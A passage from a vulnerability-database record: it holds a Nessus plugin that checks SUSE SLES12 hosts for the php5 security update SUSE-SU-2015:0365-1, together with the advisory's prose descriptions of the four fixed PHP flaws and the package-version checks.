"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-02-07T04:53:49", "bulletinFamily": "scanner", "description": "php5 was updated to fix four security issues.\n\nThese security issues were fixed :\n\n - CVE-2015-0231: Use-after-free vulnerability in the\n process_nested_data function in\n ext/standard/var_unserializer.re in PHP before 5.4.37,\n 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allowed\n remote attackers to execute arbitrary code via a crafted\n unserialize call that leverages improper handling of\n duplicate numerical keys within the serialized\n properties of an object. NOTE: this vulnerability exists\n because of an incomplete fix for CVE-2014-8142\n (bnc#910659).\n\n - CVE-2014-9427: sapi/cgi/cgi_main.c in the CGI component\n in PHP through 5.4.36, 5.5.x through 5.5.20, and 5.6.x\n through 5.6.4, when mmap is used to read a .php file,\n did not properly consider the mapping's length during\n processing of an invalid file that begins with a #\n character and lacks a newline character, which caused an\n out-of-bounds read and might (1) allow remote attackers\n to obtain sensitive information from php-cgi process\n memory by leveraging the ability to upload a .php file\n or (2) trigger unexpected code execution if a valid PHP\n script is present in memory locations adjacent to the\n mapping (bnc#911664).\n\n - CVE-2015-0232: The exif_process_unicode function in\n ext/exif/exif.c in PHP before 5.4.37, 5.5.x before\n 5.5.21, and 5.6.x before 5.6.5 allowed remote attackers\n to execute arbitrary code or cause a denial of service\n (uninitialized pointer free and application crash) via\n crafted EXIF data in a JPEG image (bnc#914690).\n\n - CVE-2014-8142: Use-after-free vulnerability in the\n process_nested_data function in\n ext/standard/var_unserializer.re in PHP before 5.4.36,\n 5.5.x before 5.5.20, and 5.6.x before 5.6.4 allowed\n remote attackers to execute arbitrary code via a crafted\n unserialize call that leverages improper handling of\n duplicate keys within the serialized properties of an\n object, a different vulnerability than CVE-2004-1019\n (bnc#910659).\n\nAdditionally a fix was included that protects against a possible NULL\npointer use (bnc#910659).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-02-06T00:00:00", "published": "2019-01-02T00:00:00", "id": "SUSE_SU-2015-0365-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=119961", "title": "SUSE SLES12 Security Update : php5 (SUSE-SU-2015:0365-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:0365-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119961);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/02/06 11:41:39\");\n\n script_cve_id(\"CVE-2004-1019\", \"CVE-2014-8142\", \"CVE-2014-9427\", \"CVE-2015-0231\", \"CVE-2015-0232\");\n script_bugtraq_id(71791, 71833, 72539, 72541);\n\n script_name(english:\"SUSE SLES12 Security Update : php5 (SUSE-SU-2015:0365-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"php5 was updated to fix four security issues.\n\nThese security issues were fixed :\n\n - CVE-2015-0231: Use-after-free vulnerability in the\n process_nested_data function in\n ext/standard/var_unserializer.re in PHP before 5.4.37,\n 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allowed\n remote attackers to execute arbitrary code via a crafted\n unserialize call that leverages improper handling of\n duplicate numerical keys within the serialized\n properties of an object. NOTE: this vulnerability exists\n because of an incomplete fix for CVE-2014-8142\n (bnc#910659).\n\n - CVE-2014-9427: sapi/cgi/cgi_main.c in the CGI component\n in PHP through 5.4.36, 5.5.x through 5.5.20, and 5.6.x\n through 5.6.4, when mmap is used to read a .php file,\n did not properly consider the mapping's length during\n processing of an invalid file that begins with a #\n character and lacks a newline character, which caused an\n out-of-bounds read and might (1) allow remote attackers\n to obtain sensitive information from php-cgi process\n memory by leveraging the ability to upload a .php file\n or (2) trigger unexpected code execution if a valid PHP\n script is present in memory locations adjacent to the\n mapping (bnc#911664).\n\n - CVE-2015-0232: The exif_process_unicode function in\n ext/exif/exif.c in PHP before 5.4.37, 5.5.x before\n 5.5.21, and 5.6.x before 5.6.5 allowed remote attackers\n to execute arbitrary code or cause a denial of service\n (uninitialized pointer free and application crash) via\n crafted EXIF data in a JPEG image (bnc#914690).\n\n - CVE-2014-8142: Use-after-free vulnerability in the\n process_nested_data function in\n ext/standard/var_unserializer.re in PHP before 5.4.36,\n 5.5.x before 5.5.20, and 5.6.x before 5.6.4 allowed\n remote attackers to execute arbitrary code via a crafted\n unserialize call that leverages improper handling of\n duplicate keys within the serialized properties of an\n object, a different vulnerability than CVE-2004-1019\n (bnc#910659).\n\nAdditionally a fix was included that protects against a possible NULL\npointer use (bnc#910659).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=907519\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=910659\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=911664\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=914690\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-8142/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9427/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-0231/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-0232/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20150365-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?458c2003\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12 :\n\nzypper in -t patch SUSE-SLE-SDK-12-2015-94=1\n\nSUSE Linux Enterprise Module for Web Scripting 12 :\n\nzypper in -t patch SUSE-SLE-Module-Web-Scripting-12-2015-94=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-mod_php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-bcmath-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-bz2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-calendar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ctype-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-dba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-dom-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-enchant-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-exif-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fastcgi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fileinfo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fpm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ftp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gettext-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-iconv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-intl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-json-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ldap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mbstring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mcrypt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mysql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-odbc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pcntl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pdo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pgsql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pspell-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-shmop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-snmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-soap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sockets-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sqlite-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-suhosin-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvmsg-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvsem-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvshm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-tokenizer-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-wddx-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlreader-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlrpc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlwriter-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xsl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-zip-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-zlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! ereg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"apache2-mod_php5-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"apache2-mod_php5-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-bcmath-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-bcmath-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-bz2-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-bz2-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-calendar-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-calendar-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ctype-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ctype-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-curl-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-curl-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-dba-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-dba-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-debugsource-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-dom-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-dom-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-enchant-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-enchant-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-exif-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-exif-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fastcgi-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fastcgi-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fileinfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fileinfo-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fpm-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fpm-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ftp-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ftp-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gd-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gd-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gettext-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gettext-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gmp-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gmp-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-iconv-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-iconv-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-intl-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-intl-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-json-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-json-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ldap-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ldap-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mbstring-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mbstring-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mcrypt-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mcrypt-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mysql-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mysql-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-odbc-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-odbc-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-openssl-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-openssl-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pcntl-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pcntl-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pdo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pdo-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pgsql-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pgsql-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pspell-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pspell-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-shmop-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-shmop-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-snmp-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-snmp-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-soap-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-soap-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sockets-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sockets-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sqlite-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sqlite-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-suhosin-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-suhosin-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvmsg-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvmsg-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvsem-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvsem-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvshm-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvshm-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-tokenizer-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-tokenizer-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-wddx-5.5.14-11.3\")) flag++;\nif 